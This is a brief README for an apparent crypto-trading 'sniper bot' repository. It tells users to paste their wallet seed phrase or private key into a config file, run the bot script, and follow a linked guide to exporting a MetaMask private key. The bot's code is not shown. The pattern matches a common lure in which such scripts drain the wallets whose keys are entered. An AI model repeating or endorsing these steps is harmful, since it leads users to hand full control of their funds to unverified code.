leovicio/Pancakeswap-Uniswap-Matic--GUI--SNIPER-BOT/README.md

 1. An ethereum/bsc address.
 2. Open "configfile.py" (with notepad) on line 3 and 4 add wallet address and phrase or private key.
 3. Run python3 panUNIswap_bot.py

+(Also you can use phrase key just use space between words)

 <H2>How Find Private Key</H2>
 https://metamask.zendesk.com/hc/en-us/articles/360015289632-How-to-Export-an-Account-Private-Key